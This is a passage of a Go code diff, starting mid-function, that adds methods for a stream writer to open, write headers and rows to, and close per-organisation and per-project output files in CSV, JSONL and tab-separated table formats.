string) error { + var err error + + if format == "all" || format == "csv" { + csvDir := filepath.Join(orgPath, "csv") + if err = os.MkdirAll(csvDir, 0o755); err != nil { + return err + } + w.orgCSV, err = 
os.OpenFile(filepath.Join(csvDir, safeName+".csv"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + if format == "all" || format == "json" { + jsonDir := filepath.Join(orgPath, "json") + if err = os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + w.orgJSON, err = os.OpenFile(filepath.Join(jsonDir, safeName+".jsonl"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + if format == "all" || format == "table" { + tableDir := filepath.Join(orgPath, "table") + if err = os.MkdirAll(tableDir, 0o755); err != nil { + return err + } + w.orgTable, err = os.OpenFile(filepath.Join(tableDir, safeName+".txt"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + return nil +} + +// openProjectFiles opens output files for a specific project +func (w *teeStreamWriter) openProjectFiles(projectID, projectPath, safeName, format string) error { + var err error + + if format == "all" || format == "csv" { + csvDir := filepath.Join(projectPath, "csv") + if err = os.MkdirAll(csvDir, 0o755); err != nil { + return err + } + w.projectCSV[projectID], err = os.OpenFile(filepath.Join(csvDir, safeName+".csv"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + if format == "all" || format == "json" { + jsonDir := filepath.Join(projectPath, "json") + if err = os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + w.projectJSON[projectID], err = os.OpenFile(filepath.Join(jsonDir, safeName+".jsonl"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + if format == "all" || format == "table" { + tableDir := filepath.Join(projectPath, "table") + if err = os.MkdirAll(tableDir, 0o755); err != nil { + return err + } + w.projectTable[projectID], err = os.OpenFile(filepath.Join(tableDir, safeName+".txt"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + return nil +} + +// writeOrgHeader 
writes header to org-level files +func (w *teeStreamWriter) writeOrgHeader(header []string, format string) error { + if format == "all" || format == "csv" { + if w.orgCSV != nil { + _, err := w.orgCSV.WriteString(strings.Join(header, ",") + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "table" { + if w.orgTable != nil { + _, err := w.orgTable.WriteString(strings.Join(header, "\t") + "\n") + if err != nil { + return err + } + } + } + + // JSON doesn't need a header line (each row is self-contained) + return nil +} + +// writeProjectHeader writes header to project-level files +func (w *teeStreamWriter) writeProjectHeader(projectID string, header []string, format string) error { + if format == "all" || format == "csv" { + if f := w.projectCSV[projectID]; f != nil { + _, err := f.WriteString(strings.Join(header, ",") + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "table" { + if f := w.projectTable[projectID]; f != nil { + _, err := f.WriteString(strings.Join(header, "\t") + "\n") + if err != nil { + return err + } + } + } + + return nil +} + +// writeOrgRow writes a row to org-level files +func (w *teeStreamWriter) writeOrgRow(row []string, format string) error { + if format == "all" || format == "csv" { + if w.orgCSV != nil { + _, err := w.orgCSV.WriteString(strings.Join(row, ",") + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "json" { + if w.orgJSON != nil { + jsonBytes, err := json.Marshal(row) + if err != nil { + return err + } + _, err = w.orgJSON.WriteString(string(jsonBytes) + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "table" { + if w.orgTable != nil { + _, err := w.orgTable.WriteString(strings.Join(row, "\t") + "\n") + if err != nil { + return err + } + } + } + + return nil +} + +// writeProjectRow writes a row to project-level files +func (w *teeStreamWriter) writeProjectRow(projectID string, row 
[]string, format string) error { + if format == "all" || format == "csv" { + if f := w.projectCSV[projectID]; f != nil { + _, err := f.WriteString(strings.Join(row, ",") + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "json" { + if f := w.projectJSON[projectID]; f != nil { + jsonBytes, err := json.Marshal(row) + if err != nil { + return err + } + _, err = f.WriteString(string(jsonBytes) + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "table" { + if f := w.projectTable[projectID]; f != nil { + _, err := f.WriteString(strings.Join(row, "\t") + "\n") + if err != nil { + return err + } + } + } + + return nil +} + +// closeAll closes all open file handles +func (w *teeStreamWriter) closeAll() { + if w.orgCSV != nil { + w.orgCSV.Close() + } + if w.orgJSON != nil { + w.orgJSON.Close() + } + if w.orgTable != nil { + w.orgTable.Close() + } + + for _, f := range w.projectCSV { + if f != nil { + f.Close() + } + } + for _, f := range w.projectJSON { + if f != nil { + f.Close() + } + } + for _, f := range w.projectTable { + if f != nil { + f.Close() + } + } +}